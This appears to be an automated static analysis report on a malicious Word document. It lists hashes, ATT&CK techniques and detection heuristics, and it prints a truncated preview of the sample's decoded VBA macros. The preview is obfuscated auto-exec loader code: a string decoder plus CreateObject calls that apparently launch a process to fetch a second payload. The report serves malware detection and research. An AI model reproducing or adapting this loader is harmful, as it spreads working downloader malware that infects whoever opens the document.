Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b7dd321cbe09edbd…

MALICIOUS

Office (OLE)

Size: 207.7 KB
Created: 2019-11-25 19:55:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: d6ecc5fc8fe605fe7eee99795fe61fad
SHA-1: 5d4a4d673d08fb0397c2d3fc0e709ca4fa31f20d
SHA-256: b7dd321cbe09edbd3cdaa5abe8a1dd478971de12cc1dafe7c6adf584e4232c72
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-exec loader that uses CreateObject and execution sink functions, suggesting it attempts to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Mruk-7410213-0' further supports this downloader functionality.

Heuristics (8)

  • ClamAV: Doc.Downloader.Mruk-7410213-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Mruk-7410213-0
  • VBA macros detected [medium] (4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31070 bytes
SHA-256: 5b959862ced805daba67a8bbb620fef1c3c8c0bd4b0594d6f7ea12887fa5d60f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Plminrroij"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Bedbmetiphn, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kdntidminmmb, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Hiooyrrza, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Asihurrliw, 3, 3, MSForms, TextBox"

Attribute VB_Name = "Pqnakdsrwg"
Attribute VB_Base = "0{BFE28C8D-6FFB-4CF4-8C63-EBF97326A9A9}{51846F77-B8C4-4179-B252-8EC9EE163449}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rybrniykr"
Function Doyjtckglco()
On Error Resume Next
   'Zlcfqohbmwnv
Cghdwlgus = 16338 + 1
      Dim vwzHEZAO()
ReDim vwzHEZAO(2)
vwzHEZAO(0) = "Debitis."
vwzHEZAO(1) = "Velit."

      While 16338 = Cghdwlgus
         Dim bYMhr()
ReDim bYMhr(1)
bYMhr(0) = WuhiAI

      Wend
      Dim SzwEB()
ReDim SzwEB(3)
SzwEB(0) = Rose
SzwEB(1) = "Voluptatibus."
SzwEB(2) = 6436

'Vxqcofpcyghct
Nmgknsjgwpur = Ceponadx(Pqnakdsrwg.Imamnwrpc)
   'Hkutitgtqad
Cghdwlgus = 16338 + 1
      Dim JemBhk()
ReDim JemBhk(3)
JemBhk(0) = "Tempore."
JemBhk(1) = Tom
JemBhk(2) = DFHHfGEX

      While 16338 = Cghdwlgus
         Dim yELHIO()
ReDim yELHIO(2)
yELHIO(0) = 4
yELHIO(1) = "Est."

      Wend
      Dim iCZrAEHAo()
ReDim iCZrAEHAo(3)
iCZrAEHAo(0) = Edmond
iCZrAEHAo(1) = LYKQELt
iCZrAEHAo(2) = "Sunt."

'Vbccrojnum
Set Uppjaowwgmpt = CreateObject(Ceponadx(Pqnakdsrwg.Imamnwrpc + Plminrroij.Kdntidminmmb + Plminrroij.Hiooyrrza))
   'Pmazepzuiaaud
Cghdwlgus = 16338 + 1
      Dim HoOeAaJ()
ReDim HoOeAaJ(3)
HoOeAaJ(0) = "Consectetur minima."
HoOeAaJ(1) = reGjDWJll
HoOeAaJ(2) = gBKtCeADH

      While 16338 = Cghdwlgus
         Dim epLqsj()
ReDim epLqsj(2)
epLqsj(0) = hnQAkMAH
epLqsj(1) = raIaKIfl

      Wend
      Dim rkUwAIvCJ()
ReDim rkUwAIvCJ(1)
rkUwAIvCJ(0) = szueEI

'Dkuessduut
Uppjaowwgmpt.XSize = Joqxdezkb + Eitxoymqstg + Mzwgtinob
   'Ormvxqdogri
Cghdwlgus = 16338 + 1
      Dim qlRfB()
ReDim qlRfB(1)
qlRfB(0) = "Ratione."

      While 16338 = Cghdwlgus
         Dim YVwlMEQJ()
ReDim YVwlMEQJ(2)
YVwlMEQJ(0) = "Nisi odit cum."
YVwlMEQJ(1) = PndVDGJJe

      Wend
      Dim QLUupiFiD()
ReDim QLUupiFiD(2)
QLUupiFiD(0) = aZwBmDF
QLUupiFiD(1) = Clayton

'Bttukgghn
Uppjaowwgmpt.YSize = Xlmjbrjfwmsp + Icrvbodmkl + Tqswccqza
   'Oikpynlv
Cghdwlgus = 16338 + 1
      Dim bREZRgF()
ReDim bREZRgF(2)
bREZRgF(0) = "Saepe."
bREZRgF(1) = 89

      While 16338 = Cghdwlgus
         Dim TieRQEv()
ReDim TieRQEv(2)
TieRQEv(0) = "Accusantium."
TieRQEv(1) = "Nesciunt officiis est provident."

      Wend
      Dim YdYJPGFK()
ReDim YdYJPGFK(1)
YdYJPGFK(0) = Cary

'Xproatfyxerlt
Falzlirv = Ceponadx(Plminrroij.Hiooyrrza + Pqnakdsrwg.Ctgnfzsiqh + Pqnakdsrwg.Hqwiyabfbb)
   'Dwdcslycy
Cghdwlgus = 16338 + 1
      Dim NNFxdyb()
ReDim NNFxdyb(1)
NNFxdyb(0) = "Aut."

      While 16338 = Cghdwlgus
         Dim KoVbnFtI()
ReDim KoVbnFtI(1)
KoVbnFtI(0) = "Error."

      Wend
      Dim IwVfJlFBC()
ReDim IwVfJlFBC(1)
IwVfJlFBC(0) = "Magni."

'Qlkgdkraoico
Hhiftklcdvsz = CreateObject(Ceponadx(Nmgknsjgwpur)).Create#(Falzlirv, Cpbjaftuka, Uppjaowwgmpt, Gwtadqkabf)
   'Loqjrauadlbkn
Cghdwlgus = 16338 + 1
      Dim ForADFKv()
ReDim ForADFKv(1)
ForADFKv(0) = 5869

      While 16338 = Cghdwlgus
         Dim wgaZB()
ReDim wgaZB(2)
wgaZB(0) = Ora
wgaZB(1) = 47

      Wend
      Dim TZIhbsN()
ReDim TZIhbsN(2)
TZIhbsN(0) = 88
TZIhbsN(1) = Maxine

'Uggdwxpixbd
End Function

Attribute VB_Name = "Kcdpgksxpo"
Function Ceponadx(Thhwdqqbcnd)
On Error Resume Next
   'Xdsnwqlorsmcu
Cghdwlgus = 16338 + 1
      Dim tPZrBD()
ReDim tPZrBD(3)
tPZrBD(0) = 6
tPZrB
... (truncated)